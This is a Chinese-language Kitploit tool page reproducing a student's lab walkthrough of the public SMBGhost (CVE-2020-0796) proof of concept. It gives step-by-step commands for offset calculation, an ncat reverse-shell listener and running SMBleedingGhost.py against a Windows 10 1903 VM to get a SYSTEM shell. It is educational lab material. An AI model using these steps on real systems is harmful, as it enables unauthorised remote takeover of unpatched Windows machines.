Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/tdevworks/cve-2020-0796-smbghost-exploit-demo
漏洞分析漏洞利用渗透测试学习与教育远程访问工具Payload 开发二进制利用实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
tdevworks/cve-2020-0796-smbghost-exploit-demo

CVE-2020-0796-SMBGhost-Exploit-Demo

用于CVE-2020-0796(SMBGhost)的教育性概念验证漏洞利用,演示Windows SMBv3上的预认证远程代码执行。包含逐步实验室设置、偏移量计算和反向Shell执行,用于受控的网络安全培训。

查看仓库
351年前尚未审核
分享

CVE-2020-0796 漏洞利用演示(SMBGhost)

该项目演示了 CVE-2020-0796(又称 SMBGhost)的概念验证 (PoC) 漏洞利用,这是一个影响使用 SMBv3 的 Windows 10 和 Windows Server 系统的严重未授权远程代码执行漏洞。该项目是学校网络安全项目的一部分。所有漏洞利用代码归功于 ZecOps。我仅出于教育目的使用并改编了这些代码,以在受控实验环境中演示 CVE-2020-0796 的利用。

演示要求

要复现此演示,需要以下设置:

攻击机

  • VirtualBox(使用 NATNetwork 进行虚拟机网络连接)
  • Windows 10(任意较新版本)
  • Python 3.x(已添加到系统 PATH)
  • Netcat(包含在 Nmap 中或单独安装)
  • GitHub PoC 中的漏洞利用脚本:
    SMBleedingGhost.py by ZecOps

目标机

  • VirtualBox(相同 NATNetwork 配置)
  • Windows 10 版本 1903,版本 19H1
    Build 18362.356 – 2019.09,家庭版或专业版(x64)
  • 已禁用 Windows 防火墙(以允许端口 445 访问)
  • GitHub PoC 中的偏移量计算脚本:
    calc_target_offsets.bat by ZecOps

演示:逐步漏洞利用

第 1 步:获取两个虚拟机的 IP 地址

  1. 在攻击机和目标机虚拟机上分别启动命令提示符。

  2. 在每个虚拟机上执行以下命令:

    root@kitploit:~
    ipconfig
    

截图 2025-05-16 172329

  1. 记下虚拟机的 IP 地址——你将在后续步骤中使用它们。

第 2 步:在目标虚拟机上计算偏移量

  1. 在目标虚拟机上,导航到 CVE-2020-0796-RCE-POC-master 文件夹。
  2. 双击运行脚本:calc_target_offsets.bat
  • 这将生成漏洞利用所需的内存偏移量。
  • 保持窗口打开并记下显示的值——你将在下一步中使用它们。

截图 2025-05-16 172350


第 3 步:在攻击虚拟机上更新漏洞利用脚本

  1. 在攻击虚拟机上,打开相同的 CVE-2020-0796-RCE-POC-master 文件夹。
  2. 右键单击 SMBleedingGhost.py,选择用记事本打开。
  3. 在 SMBleedingGhost.py 文件中,向下滚动找到以 OFFSETS = { 开头的部分。
  4. 将现有的偏移值替换为你从目标虚拟机获取的值。
  5. 编辑后保存文件。
  6. 现在可以关闭目标虚拟机上的偏移量窗口。

截图 2025-05-16 172403


第 4 步:在攻击虚拟机上启动 Netcat 监听器

打开一个新的命令提示符并运行:

root@kitploit:~
ncat -lvp 4321
  • 这将设置一个监听器,监听端口 4321,以便在成功利用后从目标虚拟机接收反向 shell。
  • 如果需要,可以更改端口号。

截图 2025-05-16 172419


第 5 步:从攻击虚拟机执行漏洞利用

  1. 打开另一个命令提示符,导航到 PoC 目录(我将我的保存在桌面上):
root@kitploit:~
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
  1. 使用相应的 IP 和端口运行漏洞利用:
root@kitploit:~
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>

截图 2025-05-16 172450

此演示中使用的示例:

root@kitploit:~
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
  • 192.168.18.61:目标虚拟机 IP
  • 192.168.18.62:攻击虚拟机 IP
  • 4321:netcat 监听器使用的端口

漏洞利用结果

如果成功,netcat 窗口将显示:

root@kitploit:~
Microsoft Windows [版本 10.0.18362.356]
(c) 2019 Microsoft Corporation。保留所有权利。

C:\Windows\system32>

这证实了:

  • 目标虚拟机已被利用
  • 攻击虚拟机现在拥有系统级权限

你可以通过执行以下命令验证访问:

root@kitploit:~
whoami

这将输出:

root@kitploit:~
whoami
nt authority\system

这意味着攻击虚拟机现在拥有目标虚拟机的系统级权限。

截图 2025-05-16 172512

你也可以运行:

root@kitploit:~
ipconfig

以验证你正在与目标虚拟机的网络进行交互。

截图 2025-05-16 172550

注意:目标虚拟机在利用后可能会崩溃。如果发生,你可以重新启动它。攻击者会话需要重启后重新建立。

致谢

本次演示基于 ZecOps 开发并公开的概念验证。

所有漏洞利用代码归功于 ZecOps。我仅出于教育目的使用并改编了这些代码,以在受控实验环境中演示 CVE-2020-0796 的利用。

参考

  • CVE-2020-0796 远程代码执行 PoC

作者

@tdevworks

免责声明

本仓库仅供教育目的创建。

所有展示的工具、脚本和技术旨在帮助用户在受控实验环境中理解网络安全漏洞。请勿尝试在任何不属于你或未经你明确许可测试的系统或网络上使用所提供材料的任何部分。

任何滥用本软件的行为均不由作者负责。

下载工具